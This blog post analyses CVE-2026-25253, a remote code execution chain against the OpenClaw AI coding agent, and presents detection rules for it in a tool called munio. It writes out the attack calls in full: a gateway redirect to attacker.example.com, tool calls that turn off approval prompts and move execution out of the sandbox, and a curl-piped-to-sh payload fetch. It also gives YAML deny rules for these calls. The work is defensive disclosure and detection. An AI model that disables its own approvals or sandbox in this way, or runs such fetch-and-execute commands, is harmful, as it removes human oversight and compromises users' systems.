In February 2026, security researcher depthfirst.com disclosed a striking vulnerability in OpenClaw: a 1-click remote code execution chain, tracked as CVE-2026-25253 (CVSS 8.8).
The attack itself is a well-crafted 7-step chain. But what caught our attention wasn’t the final payload — it was steps 5 and 6. Before executing any malicious code, the attacker programmatically turns off the victim’s safety controls. Approval prompts, sandbox isolation — all disabled through legitimate API calls.
This isn’t a bypass. The controls aren’t circumvented. They’re switched off.
We spent time analyzing this pattern, and we believe it represents a distinct attack class worth naming: Safety Control Tampering (SCT). This post walks through the CVE, explains why this pattern matters beyond OpenClaw, and describes how we built detection for it in munio.
How CVE-2026-25253 works
OpenClaw is the most widely used open-source AI coding agent — 328K GitHub stars, over 2 million monthly active users. It connects to MCP servers, executes code, reads files, and browses the web, all driven by tool calls.
The following is based on the original disclosure by depthfirst.com. As of March 2026, Censys shows 21,639 OpenClaw instances exposed to the internet.
Steps 1-4: Gaining control
The attacker first redirects OpenClaw’s gateway to a server they control:
config.patch → { gatewayUrl: "wss://attacker.example.com/ws" }Through this hijacked connection, they enumerate available tools, map the execution environment, and identify the sandbox configuration. These steps look like ordinary tool calls — nothing a scanner would flag.
Step 5: Turning off approvals
Here’s where it gets interesting:
{ "toolName": "exec.approvals.set", "params": { "ask": "off", "security": "full" }}This disables the approval prompt — the dialog that asks “Allow this command?” before code execution. The security: "full" parameter switches to permissive mode. The user sees nothing: no prompt, no notification, no log entry.
Step 6: Escaping the sandbox
{ "toolName": "config.patch", "params": { "patch": "tools.exec.host: gateway" }}Code execution moves from the sandboxed container to the host machine. The agent now runs commands directly on the user’s system.
Step 7: Arbitrary execution
curl -s https://attacker.example.com/payload.sh | shAt this point, the attacker has full command execution with the user’s privileges.
The blind spot
Most MCP and agent security tools are built around payload detection — they look for command injection patterns, path traversal sequences, SSRF indicators. They analyze each tool call and ask: is this input dangerous?
That approach works for step 7. But steps 5 and 6 don’t look dangerous at all. There’s no shell metacharacter, no ../, no internal IP address. They’re configuration changes — setting a flag to "off", changing a host parameter. Individually, they’re benign.
The problem is that after these two calls, every safety mechanism that would have caught step 7 is gone. The attacker doesn’t need to bypass detection — there’s nothing left to detect with.
This is the gap. Security tooling checks what a tool call does. It doesn’t check whether a tool call dismantles the controls that protect against future calls.
Defining Safety Control Tampering
We’re proposing Safety Control Tampering as a distinct category to describe attacks where an adversary programmatically disables, weakens, or removes safety controls as a precursor to exploitation.
It’s related to privilege escalation, but not the same thing. Privilege escalation gains new capabilities. SCT removes existing guardrails. The attacker doesn’t need more access — they need fewer checks.
Based on our analysis of CVE-2026-25253 and related attack patterns across agent platforms, we’ve identified five atomic primitives:
| Primitive | Description | Example |
|---|---|---|
| DISABLE_APPROVAL | Turns off user confirmation requirements | exec.approvals.set({ask: "off"}) |
| WEAKEN_POLICY | Relaxes security mode or policy strictness | exec.approvals.set({security: "full"}) |
| ESCAPE_SANDBOX | Breaks out of container or sandbox isolation | config.patch({sandbox: "off"}) |
| ELEVATE_PRIVILEGE | Switches to host-level or privileged execution | config.patch({tools.exec.host: "gateway"}) |
| BYPASS_VALIDATION | Skips input or origin validation | Gateway URL redirect to attacker-controlled server |
These aren’t OpenClaw-specific. Any system where an AI agent has access to tools that modify its own safety configuration is potentially vulnerable.
Standards mapping
SCT maps to existing security frameworks:
- OWASP ASI03 — Identity and Privilege Abuse
- CWE-269 — Improper Privilege Management
- CWE-863 — Incorrect Authorization
- MITRE ATLAS AML.T0054 — LLM Prompt Injection (Safety Bypass)
Detection with munio
We built SCT detection into munio across multiple layers. The goal is to catch this pattern at the earliest possible point in the chain — not at the final payload.
Runtime constraints
munio ships YAML-based constraints that block SCT primitives before they execute. For the OpenClaw attack chain, three constraints cover steps 1, 5, and 6:
Step 1 — Gateway URL override:
name: openclaw-gateway-url-overrideaction: config.patchcheck: type: regex_deny field: "*" patterns: - "\\bgatewayUrl\\b" - "\\bwss?://[^\\s]+"on_violation: blockseverity: criticalStep 5 — Approval disabling:
name: openclaw-safety-disable-approvalsaction: exec.approvals.setcheck: type: denylist field: ask values: ["off", "false", "no", "never", "disable", "disabled", "none", "0"]on_violation: blockseverity: criticalStep 6 — Sandbox escape:
name: openclaw-sandbox-escape-host-modeaction: config.patchcheck: type: regex_deny field: "*" patterns: - "\\bhost\\s*:\\s*[\"']?gateway[\"']?" - "\\bsandbox\\s*:\\s*[\"']?(off|false|disabled|none)[\"']?"on_violation: blockseverity: criticalWhen the attack reaches step 5, munio blocks it:
POST /v1/openclaw/before-tool-call
tool: exec.approvals.set
params: {“ask”: “off”, “security”: “full”}
BLOCKED Field ‘ask’ matched denied value: off
constraint: openclaw-safety-disable-approvals
category: ASI03 (Identity/Privilege Abuse)
The chain breaks. Steps 6 and 7 never execute.
Static analysis
munio scan detects SCT exposure before any attack happens:
- Config scan: flags servers configured with safety-disabling defaults (
APPROVAL_MODE=off,--no-safety) - Static analysis (L3): identifies tools whose names and parameters indicate safety control modification
- Composition analysis (L5): traces data flow across tools and flags chains like
FETCH_UNTRUSTED → SAFETY_CONFIG → CODE_EXEC
$ munio check '{"tool":"exec.approvals.set","args":{"ask":"off"}}' -c openclaw
BLOCKED┌─────────────────────────────────────┬──────────┬─────────────────────────────┬───────┐│ Constraint │ Severity │ Message │ Field │├─────────────────────────────────────┼──────────┼─────────────────────────────┼───────┤│ openclaw-safety-disable-approvals │ critical │ Value matches denylist │ ask ││ │ │ (MatchMode.EXACT) │ │└─────────────────────────────────────┴──────────┴─────────────────────────────┴───────┘Mode: enforce | Checked: 3 | 0.3msBeyond OpenClaw
SCT is not specific to OpenClaw. It’s a pattern that applies wherever an AI agent can modify its own operating constraints:
- An MCP server that exposes a
security.setorguardrails.configuretool - A LangChain agent with access to tools that modify its own safety settings
- Any system where “disable safety check” is an available action
If the agent can call it, an attacker can make the agent call it — through prompt injection, tool poisoning, or, as in this case, hijacked instructions.
munio includes 3 generic constraints designed to catch SCT regardless of the underlying platform:
generic-safety-control-tampering— flags tool calls targeting approval, safety, or guardrail settings with disabling valuesgeneric-sandbox-escape-config— flags configuration changes that weaken sandbox or isolation boundariesgeneric-safety-control-sequence— detects the temporal pattern of a config change followed by code execution within a 5-minute window
Recommendations
If you run OpenClaw: check your exposure. The vulnerability affects all versions with default configuration.
If you build with AI agents: audit whether your agents have access to tools that can modify their own safety controls. If they do, those tools need pre-execution verification.
To scan your MCP servers for SCT exposure:
pip install muniomunio scan --server "npx @your/mcp-server"munio check '{"tool":"exec.approvals.set","args":{"ask":"off"}}' -c openclawOpenClaw-specific constraints: constraints/openclaw/asi03-privilege-abuse/
Generic SCT constraints: constraints/generic/asi03-privilege-abuse/
Documentation: OpenClaw Integration | Security Model | Constraints Reference
CVE-2026-25253 was discovered and disclosed by depthfirst.com. Our contribution is the SCT taxonomy and automated detection tooling for this attack class.